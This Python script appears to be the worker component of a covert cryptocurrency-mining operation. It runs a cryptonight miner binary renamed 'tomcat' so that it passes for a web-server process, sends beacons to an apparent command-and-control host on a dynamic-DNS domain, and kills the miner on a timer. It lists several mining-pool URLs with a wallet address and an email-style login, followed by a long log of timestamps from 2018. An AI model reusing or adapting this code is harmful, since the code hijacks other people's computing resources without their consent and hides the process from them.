import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:01.788267
#2018-02-17 16:10:04.527985
#2018-02-17 18:17:01.526846
#2018-02-17 20:04:01.888868
#2018-02-17 21:52:01.782392
#2018-02-17 23:37:01.493685
#2018-02-18 01:26:07.906685
#2018-02-18 03:13:06.188282
#2018-02-18 05:02:05.161585
#2018-02-18 06:55:07.292952
#2018-02-18 08:43:03.581548
#2018-02-18 10:29:03.929416
#2018-02-18 12:15:08.166930
#2018-02-18 14:02:06.058707
#2018-02-18 15:52:03.916359
#2018-02-18 17:42:06.512827
#2018-02-18 19:29:04.826670
#2018-02-18 21:14:06.684609
#2018-02-18 23:02:05.248049
#2018-02-19 00:49:07.228133
#2018-02-19 02:36:05.400822
#2018-02-19 04:22:04.252811
#2018-02-19 06:07:06.713786
#2018-02-19 07:55:07.409899
#2018-02-19 09:46:06.421962
#2018-02-19 11:36:01.883517
#2018-02-19 13:23:01.663676
#2018-02-19 15:10:10.544438
#2018-02-19 16:57:10.734850
#2018-02-19 18:44:06.290468
#2018-02-19 20:32:08.461523
#2018-02-19 22:20:06.766303
#2018-02-20 00:05:07.665423
#2018-02-20 01:53:01.726767
#2018-02-20 03:43:07.307304
#2018-02-20 05:28:07.368039
#2018-02-20 07:12:04.645650
#2018-02-20 08:57:07.382041
#2018-02-20 10:42:06.066337
#2018-02-20 12:28:06.923450
#2018-02-20 14:16:01.405653
#2018-02-20 16:01:04.029363
#2018-02-20 17:47:09.080990
#2018-02-20 19:39:06.327461
#2018-02-20 21:27:05.475302
#2018-02-20 23:10:06.425031
#2018-02-21 00:55:07.579448
#2018-02-21 02:42:06.356482
#2018-02-21 04:29:05.257820
#2018-02-21 06:16:01.489789
#2018-02-21 08:02:06.080481
#2018-02-21 09:48:04.466178
#2018-02-21 11:37:05.033181
#2018-02-21 13:26:06.644394
#2018-02-21 15:13:01.636990
#2018-02-21 17:03:01.947001
#2018-02-21 18:51:06.477619
#2018-02-21 20:37:04.558202
#2018-02-21 22:22:04.271950
#2018-02-22 00:12:07.124664
#2018-02-22 02:01:01.979924
#2018-02-22 03:46:07.435539
#2018-02-22 05:33:05.132395
#2018-02-22 07:18:05.537155
#2018-02-22 09:05:08.629124
#2018-02-22 10:53:04.720619
#2018-02-22 12:39:01.625230
#2018-02-22 14:24:01.664619
#2018-02-22 16:10:09.558399
#2018-02-22 17:57:08.659281
#2018-02-22 19:46:09.457220
#2018-02-22 21:36:03.264008
#2018-02-22 23:24:01.702470
#2018-02-23 01:10:08.237750
#2018-02-23 02:57:01.368180
#2018-02-23 04:45:07.574924
#2018-02-23 06:32:01.434024
#2018-02-23 08:19:04.341149
#2018-02-23 10:35:06.567889
#2018-02-23 12:29:05.210704
#2018-02-23 14:17:05.643659
#2018-02-23 16:07:09.556100
#2018-02-23 17:53:06.345875
#2018-02-23 19:40:04.797486
#2018-02-23 21:23:07.486428
#2018-02-23 23:11:07.334982
#2018-02-24 00:59:05.258599
#2018-02-24 02:53:06.724036
#2018-02-24 04:43:07.159933
#2018-02-24 06:28:01.977556
#2018-02-24 08:16:07.515642
#2018-02-24 10:01:05.471776
#2018-02-24 11:58:05.450531
#2018-02-24 13:46:01.291392
#2018-02-24 15:41:01.776906
#2018-02-24 17:34:05.061177
#2018-02-24 19:20:07.525537
#2018-02-24 21:11:05.381058
#2018-02-25 01:10:07.485868
#2018-02-25 04:54:07.433022
#2018-02-25 08:26:01.639375